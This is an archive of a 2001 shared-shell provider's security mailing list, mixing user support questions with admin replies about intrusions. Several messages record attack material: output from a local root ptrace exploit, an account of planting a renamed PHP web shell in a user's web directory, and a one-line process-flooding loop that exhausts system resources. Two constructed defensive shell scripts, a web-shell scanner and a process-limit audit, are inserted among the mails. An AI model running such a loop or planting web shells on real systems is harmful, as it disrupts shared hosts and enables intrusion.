everybody knows, we don't have a good reputation because of free bots
etc... then let's do "the small networks big connection" instead.

Gentlemen,
if you are interested, please send me your C/N records (regarding
irc.polarhome.com), including suggested passwords, with connection class
explanations etc, ASAP.

Please note, that irc.polarhome.com is CNAME for gate.polarhome.com that
runs with DHCP IP address:
it means that it is very likely to change sometimes as well as identd
response.

Kind regards,
Z






------=_NextPart_000_0086_01C1413C.9AD6DBE0--


From apache@gate.polarhome.com  Thu Sep 20 16:08:52 2001
Received: (from apache@localhost)
	by gate.polarhome.com (8.11.6/8.8.7) id f8KE8q511371;
	Thu, 20 Sep 2001 16:08:52 +0200
Date: Thu, 20 Sep 2001 16:08:52 +0200
Message-Id: <200109201408.f8KE8q511371@gate.polarhome.com>
To: ozzy@polarhome.com
Subject: RE: [Security] B - achieving root permisions from normal user account
cc: security@polarhome.com
From: zoli@polarhome.com
X-Sender: phpop at www.polarhome.com
X-Sender-IP: 212.209.198.194
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

I checked it and it does not like to work...
BUT if you read carefully the instructions, it says:

 * This exploit does not work on 2.4.x because kernel won't set suid
 * privileges if user ptraces a binary.

and if you check: 
root@gate~# uname -nrs
Linux gate.polarhome.com 2.4.3-12

It will explain...

This kernel is not bug free at all, but that one is not the right exploit.

Regards, Z

>ozzy@gate~/hack$ ./epcs2
>bug exploited successfully.
>enjoy!
>sh-2.04$ exit
>ozzy@gate~/hack$ ./epcs2
>ptrace: PTRACE_ATTACH: Operation not permitted
>d0h! error!
>ozzy@gate~/hack$ date
>Thu Sep 20 03:20:32 CEST 2001
>The source of the local exploit is /home/o/ozzy/hack/epcs2.c
>Works the first time only after system reboot.
>Actually it is for slackware but obviously works on RedHat 7.1.
>^_^
>Best wishes!
>	Ventsislav Nikolov


From traderc@mail.ru  Mon Sep 24 00:34:47 2001
Received: from mx4.mail.ru (mx4.port.ru [194.67.57.14])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8NMYkP24607
	for <security@polarhome.com>; Mon, 24 Sep 2001 00:34:47 +0200
Received: from mx6.port.ru (mx6.int [10.0.0.42])
	by mx4.mail.ru (8.11.3/8.11.1) with ESMTP id f8NFJ8138439
	for <security@polarhome.com>; Sun, 23 Sep 2001 19:19:08 +0400 (MSD)
Received: from f12.int ([10.0.0.85] helo=f12.port.ru)
	by mx6.port.ru with esmtp (Exim 3.14 #1)
	id 15lB2C-000NEN-00
	for security@polarhome.com; Sun, 23 Sep 2001 19:19:08 +0400
Received: from mail by f12.port.ru with local (Exim 3.14 #1)
	id 15lB2B-000I6x-00
	for security@polarhome.com; Sun, 23 Sep 2001 19:19:07 +0400
Received: from [62.217.133.22] by win.mail.port.ru with HTTP;
	Sun, 23 Sep 2001 15:19:07 +0000 (GMT)
From: "cool trader" <traderc@mail.ru>
To: security@polarhome.com
Mime-Version: 1.0
X-Mailer: mPOP Web-Mail 2.19
X-Originating-IP: [62.217.133.22]
Date: Sun, 23 Sep 2001 15:19:07 +0000 (GMT)
Reply-To: "cool trader" <traderc@mail.ru>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id: <E15lB2B-000I6x-00@f12.port.ru>
Subject: [Security] (no subject)
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

Dear Polarhome!
I've got some questions!
It is really nice that you provide such services for free!
If I have domains, can I make them as vhosts on bnc using your shell?
Thanx and best wishes, Anar!

From arpadffy@polarhome.com  Mon Sep 24 01:18:45 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8NNIjP06724;
	Mon, 24 Sep 2001 01:18:45 +0200
Message-ID: <001901c14487$2e849880$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: "cool trader" <traderc@mail.ru>, <security@polarhome.com>
References: <E15lB2B-000I6x-00@f12.port.ru>
Subject: Re: [Security] (no subject)
Date: Mon, 24 Sep 2001 01:26:33 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

thanks a lot, but we have just one IP (with DHCP) that we can not use for
vhosts...
regards, Z
Give us leased line with few IP addresses, then you will get vhosts.

Regards, Z

----- Original Message -----
From: "cool trader" <traderc@mail.ru>
To: <security@polarhome.com>
Sent: Sunday, September 23, 2001 5:19 PM
Subject: [Security] (no subject)


> Dear Polarhome!
> I've got some questions!
> It is really nice that you provide such services for free!
> If I have domains, can I make them as vhosts on bnc using your shell?
> Thanx and best wishes, Anar!


From arpadffy@polarfox.com  Mon Sep 24 01:21:04 2001
Received: from www3.aname.net (www3.aname.net [194.18.94.103])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8NNL3P06842
	for <security@polarhome.com>; Mon, 24 Sep 2001 01:21:03 +0200
Received: from sea (h229n2fls31o873.telia.com [213.66.228.229])
	by www3.aname.net (8.11.6/8.11.3) with SMTP id f8NL4as31085
	for <security@polarhome.com>; Sun, 23 Sep 2001 23:04:39 +0200
Message-ID: <012001c14474$72ff17a0$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarfox.com>
To: <security@polarhome.com>
Date: Sun, 23 Sep 2001 23:12:23 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] exploit #3
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

gate.polarhome.com fell for the first time.

To: arpadffy@polarfox.com
From: root@hackermuda.org
Subject: Re: I've been hacked

...

I am using a script called phpshell.php that I modified into my language.
You can read the explanation of the script at
http://www.gimpster.com/php/phpshell/index.php

I put it in my home directory /home/d/dookie/public_html, named test.php

Then I open it from the browser:
http://www.polarhome.com/~dookie/test.php

The script works.

That's all.
...

God bless,
rahul-x
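
Seen from the administrator's side, the script described in the message above is an ordinary PHP file under a user's public_html whose name (test.php) says nothing about what it does, so a check has to look at content. The following is an added example, not part of the original messages: it walks the /home/<letter>/<user>/public_html layout quoted above and reports PHP files that call command-execution functions. The function names, the pattern list and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original thread. Assumptions: homes live under
# <root>/home/<letter>/<user>/public_html (the layout quoted in the message);
# function names, pattern list and sample files are constructed here.

# PHP functions that pass a string to the operating system.
EXEC_FUNCS='system|exec|shell_exec|passthru|popen|proc_open'

# scan_public_html HOME_ROOT
# Prints "user<TAB>file<TAB>function" for each distinct call found per file.
scan_public_html() {
    find "$1" -type f -path '*/public_html/*' \
        \( -name '*.php' -o -name '*.php3' -o -name '*.phtml' \) 2>/dev/null |
    while IFS= read -r file; do
        # The user name is the path component just before public_html.
        user=$(printf '%s\n' "$file" |
               sed 's|.*/\([^/]*\)/public_html/.*|\1|')
        # A call is a listed name followed by "(" and not preceded by a word
        # character, ">" or ":" (so curl_exec() and $db->exec() are skipped).
        grep -ioE "(^|[^A-Za-z0-9_>:])($EXEC_FUNCS)[[:space:]]*\(" "$file" |
        sed -e 's/^[^A-Za-z]//' -e 's/[[:space:]]*($//' |
        tr 'A-Z' 'a-z' | sort -u |
        while IFS= read -r fn; do
            printf '%s\t%s\t%s\n' "$user" "$file" "$fn"
        done
    done
}

# make_sample_tree DIR
# Builds a constructed tree: two files that should be flagged, one clean file.
make_sample_tree() {
    mkdir -p "$1/home/a/alice/public_html" "$1/home/b/bob/public_html" \
             "$1/home/c/carol/public_html"
    printf '%s\n' '<?php system("uptime"); ?>' \
        > "$1/home/a/alice/public_html/test.php"
    printf '%s\n' '<?php echo Shell_Exec("date");' 'passthru("uptime"); ?>' \
        > "$1/home/b/bob/public_html/index.php"
    printf '%s\n' '<?php $db->exec("SELECT 1"); curl_exec($ch);' \
        'echo "system ok"; ?>' > "$1/home/c/carol/public_html/page.php"
}

# Demo on the constructed tree; only a temporary directory is touched.
demo_dir=$(mktemp -d) && make_sample_tree "$demo_dir" &&
    scan_public_html "$demo_dir/home"
rm -rf "$demo_dir"
```

A hit is a lead for review, not a verdict: legitimate scripts call these functions too, and a match by content still depends on the file being readable by the account that runs the scan.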




From arpadffy@polarhome.com  Tue Sep 25 00:22:16 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8OMMCP14539;
	Tue, 25 Sep 2001 00:22:16 +0200
Message-ID: <011201c14548$760845a0$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: "cool trader" <traderc@mail.ru>
Cc: <security@polarhome.com>
References: <E15lbgj-000Pbr-00@f7.port.ru>
Subject: Re: Re[4]: [Security] (no subject)
Date: Mon, 24 Sep 2001 23:42:47 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

> Please review the following site if there are any solution possibilities
> using such a service:
> http://www.no-ip.com

No problem from my side... but it seems this update client is not safe enough
(have you read the news??)
I will dig into it a bit... and come back later.

Very important note: please do not base any important application, content
etc. on polarhome.com hosts.
I cannot guarantee 24/7 uptime, content security... polarhome.com is just
one non-commercial effort at shell popularization and education. It is not a
commercial site that has measures, norms and 99.99% uptime.
polarhome.com can close without any warning one day when I run out of
patience, money, resources or whatever... it is a one-man-one-dream
project.

Please, keep that in mind when you make big plans.

Regards, Z


From usdl@the-pentagon.com  Thu Sep 27 00:05:17 2001
Received: from greekemail.com ([208.133.128.112])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8QM5Ab04176
	for <security@polarhome.com>; Thu, 27 Sep 2001 00:05:16 +0200
Received: from the-pentagon.com [192.168.1.24] by greekemail.com
  (SMTPD32-6.00) id A457FA00D2; Wed, 26 Sep 2001 17:37:46 +0100
Message-ID: <11478200193262229365@the-pentagon.com>
X-EM-Version: 5, 0, 0, 4
X-EM-Registration: #01E0520310450300B900
X-Priority: 3
X-Mailer: My Own Email v4.00
From: "Um Sonho De Liberdade" <usdl@the-pentagon.com>
To: security@polarhome.com
Date: Wed, 26 Sep 2001 17:02:09 -0500
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Subject: [Security] [no subject]
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

Hi, I have an account at polarhome.com.

Is shell telnet incapacitated?




From a_d@luxadmin.org  Fri Sep 28 05:38:11 2001
Received: from luxadmin.org (pppoe60-luxdsl-111.pt.lu [213.166.60.111])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8S3c9b25737;
	Fri, 28 Sep 2001 05:38:10 +0200
Received: by luxadmin.org (Postfix, from userid 1102)
	id 4C796E78C4; Fri, 28 Sep 2001 05:07:27 +0200 (MEST)
To: root@polarhome.com
Cc: security@polarhome.com
Message-Id: <20010928030727.4C796E78C4@luxadmin.org>
Date: Fri, 28 Sep 2001 05:07:27 +0200 (MEST)
From: a_d@luxadmin.org
Subject: [Security] i hacked u
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

I found a certain "hole" which sucked all your machine power.. and gave this error to any user: Resource temporarily unavailable. This was made by doing this:
while :; do (find / &); done
Hope this helps improve your security and that will give me certain privileges on polarhome.

From nobody@mailbox.gr  Fri Sep 28 06:14:55 2001
Received: from mailbox.gr (mailbox.gr [216.121.96.103])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8S4Esb02308
	for <security@polarhome.com>; Fri, 28 Sep 2001 06:14:54 +0200
Received: (from nobody@localhost)
	by mailbox.gr (8.9.3/8.9.3) id HAA13792;
	Fri, 28 Sep 2001 07:16:13 +0300
Date: Fri, 28 Sep 2001 07:16:13 +0300
Message-Id: <200109280416.HAA13792@mailbox.gr>
To: security@polarhome.com
Cc: 
From: "kernel kernel" <kernel@mailbox.gr>
Subject: [Security] plz helpME
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi.
One question:
1) How can I upload & run eggdrop1.6.6 in my home directory (pwd=~nestus)?
Please help me.
2) What is the file "eggdrop.conf" in my home directory?
Thanks.




From arpadffy@polarhome.com  Sun Sep 30 10:42:51 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8U8gcb01245;
	Sun, 30 Sep 2001 10:42:51 +0200
Message-ID: <010401c1498d$00fbc180$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: <a_d@luxadmin.org>
Cc: <security@polarhome.com>
References: <20010928030727.4C796E78C4@luxadmin.org>
Date: Sun, 30 Sep 2001 10:42:41 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] Re: i hacked u
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

If you read the hack rules carefully... you will find that fork attacks do
not count, especially if you want to paralyze the system.

You did run the script... therefore your account has been disabled with all
your network/hosts.
This is not the right way to achieve higher privileges... sorry.

regards, Z


----- Original Message -----
From: <a_d@luxadmin.org>
To: <root@polarhome.com>
Cc: <security@polarhome.com>
Sent: Friday, September 28, 2001 5:07 AM
Subject: i hacked u


> I found a certain "hole" which sucked all your machine power.. and gave
> this error to any user: Resource temporarily unavailable. This was made by
> doing this:
> while :; do (find / &); done
> Hope this helps improve your security and that will give me certain
> privileges on polarhome.


From m3rlin@abv.bg  Tue Oct  2 06:24:29 2001
Received: from webmail.gyuvetch.bg ([194.153.145.78])
	by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f924OSb05696
	for <security@polarhome.com>; Tue, 2 Oct 2001 06:24:28 +0200
Received: (qmail 18866 invoked from network); 1 Oct 2001 21:17:42 -0000
Received: from abv1.ni.bg (HELO abv.bg) (192.168.151.20)
  by oas.netinfo.bg with SMTP; 1 Oct 2001 21:17:42 -0000
Received: (qmail 27207 invoked by uid 99); 1 Oct 2001 21:17:39 -0000
Message-ID: <20011001211739.27206.qmail@abv.bg>
From: "Vasil Medarov" <m3rlin@abv.bg>
To: <security@polarhome.com>
Date: Tue, 02 Oct 2001 00:17:39 +0300
MIME-Version: 1.0
X-Mailer: WebMail 2.0 (abv.bg)
Content-Type: text/plain; charset=windows-1251
Content-Transfer-Encoding: 8bit
Subject: [Security] Vhost
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

Hello :( I have a big problem :(( I need you to help me because
I can't use your shell ... :(( Really, your hosts are
G-lined :(( at the UniBG network ... or, for sure, I'd say banned

-irc.otel.net- *** G-lined
-
-irc.otel.net- *** Banned: flood shell (2001/10/01 15.06)

Look :(( some stupid guy is using your shell to flood :(( ...
and now I can't use your services.. I'm not good with
English but I think you understand me. Please do something
because I can chat only there ... :( I'm waiting for your answer,
please.





From superisterico@libero.it  Tue Oct  2 07:56:46 2001
Received: from smtp2.libero.it (smtp2.libero.it [193.70.192.52])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f925uhb20064
	for <security@polarhome.com>; Tue, 2 Oct 2001 07:56:45 +0200
Received: from istericor0x (151.21.137.132) by smtp2.libero.it (6.0.021)
        id 3B9C90110061E858 for security@polarhome.com; Mon, 1 Oct 2001 19:50:39 +0200
Message-ID: <000801c14aa1$5a0d5da0$84891597@istericor0x>
From: "ISTERICO" <superisterico@libero.it>
To: <security@polarhome.com>
Date: Mon, 1 Oct 2001 19:48:59 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C14AB2.1CD5EAE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2615.200
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200
Subject: [Security] protesta.
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C14AB2.1CD5EAE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello. I am a registered user of your service. I cannot telnet to your
server to set up my bnc. Most of the time it tells me Login incorrect,
although the password is right. I have also tried with other accounts,
but nothing: always the same error. Today, instead, it always tells me
"connessione all'host perduta". Is it the server that has problems, or is
it my PC, my telnet?
Thanks for listening.
I await your replies.


------=_NextPart_000_0005_01C14AB2.1CD5EAE0--


From arpadffy@polarhome.com  Tue Oct  2 14:16:48 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f92CGmb19133;
	Tue, 2 Oct 2001 14:16:48 +0200
Message-ID: <003801c14b3d$3bca81a0$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: "ISTERICO" <superisterico@libero.it>, <security@polarhome.com>
References: <000801c14aa1$5a0d5da0$84891597@istericor0x>
Subject: Re: [Security] protesta.
Date: Tue, 2 Oct 2001 14:24:09 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0029_01C14B4D.E6618400"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format.

------=_NextPart_000_0029_01C14B4D.E6618400
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi,

If you take it in English maybe we can help you...
Regards, Z
  ----- Original Message -----
  From: ISTERICO
  To: security@polarhome.com
  Sent: Monday, October 01, 2001 7:48 PM
  Subject: [Security] protesta.


  Hello. I am a registered user of your service. I cannot telnet to your
  server to set up my bnc. Most of the time it tells me Login incorrect,
  although the password is right. I have also tried with other accounts,
  but nothing: always the same error. Today, instead, it always tells me
  "connessione all'host perduta". Is it the server that has problems, or is
  it my PC, my telnet?
  Thanks for listening.
  I await your replies.


------=_NextPart_000_0029_01C14B4D.E6618400--


From zoltan.arpadffy@essnet.se  Fri Oct 19 16:23:13 2001
Received: from essnet.se (fwall.essnet.se [212.209.198.194])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f9JENCM18773;
	Fri, 19 Oct 2001 16:23:12 +0200
Received: from tfsgw.essnet.se ([194.132.53.235]) by fwall.essnet.se with SMTP id <119043>; Fri, 19 Oct 2001 16:22:32 +0200
Message-Id: <TFSJUQYM@essnet.se>
From: zoltan.arpadffy@essnet.se
Date:  Fri, 19 Oct 2001 16:21:22 +0200
To: polarhome@polarhome.com
Cc: security@polarhome.com, admins@polarhome.com
MIME-version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
X-Mailer: TFS Secure Messaging /300000031/221110291/221041054/221001705/
X-Mailer: Version 4.61 Build 202
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by gate.polarhome.com id f9JENCM18773
Subject: [Security] kernel upgrade
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

This weekend gate.polarhome.com will be rebooted because of a kernel upgrade.
Hope it will solve the PAM limit problems.

Regards, Z
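
The flood reported on 28 September made fork() fail with "Resource temporarily unavailable" for every user, which is consistent with one account filling the process table without hitting a per-user cap; the "PAM limit" mentioned above is the usual place to set such a cap, so that the error stays confined to the flooding account. The following is an added example, not part of the original messages: it assumes the cap is an nproc entry in a pam_limits limits.conf file and compares per-user process counts (one user name per process, as printed by ps -eo ruser=) with it. Function names, the 80% warning ratio and the sample data are constructed.

```shell
#!/bin/sh
# Added example, not from the original thread. Assumption: per-user process
# caps are set as "nproc" entries in a pam_limits limits.conf file. Function
# names, the 80% warning ratio and all sample data are constructed here.

# nproc_limit_for USER LIMITS_FILE
# Prints the hard nproc limit that applies to USER. An entry naming the user
# wins over the "*" default; "*" is not applied to root. @group entries are
# not evaluated in this example. Prints "unlimited" if nothing applies.
nproc_limit_for() {
    awk -v u="$1" '
        /^[[:space:]]*#/ || NF < 4                   { next }
        $3 != "nproc" || ($2 != "hard" && $2 != "-") { next }
        $1 == u                                      { own = $4 }
        $1 == "*" && u != "root"                     { dflt = $4 }
        END {
            if (own != "")       print own
            else if (dflt != "") print dflt
            else                 print "unlimited"
        }' "$2"
}

# audit_nproc PS_FILE LIMITS_FILE
# PS_FILE holds one user name per running process.
# Prints "user count limit status"; status is OK, WARN (at or above 80% of
# the limit), AT_LIMIT (further fork() calls fail) or NO_LIMIT.
audit_nproc() {
    sort "$1" | uniq -c | while read -r count user; do
        [ -n "$user" ] || continue
        limit=$(nproc_limit_for "$user" "$2")
        case $limit in
            ''|*[!0-9]*) status=NO_LIMIT ;;
            *)  if   [ "$count" -ge "$limit" ];                then status=AT_LIMIT
                elif [ $((count * 100)) -ge $((limit * 80)) ]; then status=WARN
                else status=OK
                fi ;;
        esac
        printf '%s %s %s %s\n' "$user" "$count" "$limit" "$status"
    done
}

# make_sample DIR
# Writes a constructed limits.conf and a constructed process list into DIR.
make_sample() {
    cat > "$1/limits.conf" <<'EOF'
# constructed sample; syntax: <domain> <type> <item> <value>
*     soft  nproc   30
*     hard  nproc   40
*     hard  nofile  256
anna  hard  nproc   100
EOF
    for spec in anna:50 bob:12 carol:33 eve:40 root:5; do
        n=${spec#*:}
        while [ "$n" -gt 0 ]; do
            printf '%s\n' "${spec%%:*}"
            n=$((n - 1))
        done
    done > "$1/ps.txt"
}

# Demo on the constructed data; only a temporary directory is touched.
demo_dir=$(mktemp -d) && make_sample "$demo_dir" &&
    audit_nproc "$demo_dir/ps.txt" "$demo_dir/limits.conf"
rm -rf "$demo_dir"
```

An account reported as NO_LIMIT is the one that can exhaust the process table for everybody; on Linux the kernel counts threads against nproc as well, so a ps-based count is a lower bound.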

From return@trafficmagnet.net  Wed Nov 28 02:10:23 2001
Received: from ns4.trafficmagnet.net ([211.101.236.28])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id fAS1ALj25353
	for <security@polarhome.com>; Wed, 28 Nov 2001 02:10:22 +0100
Received: from sendmail ([211.101.236.29])
	by ns4.trafficmagnet.net (8.9.3/8.9.3) with SMTP id NAA27659
	for <security@polarhome.com>; Tue, 27 Nov 2001 13:04:13 +0800
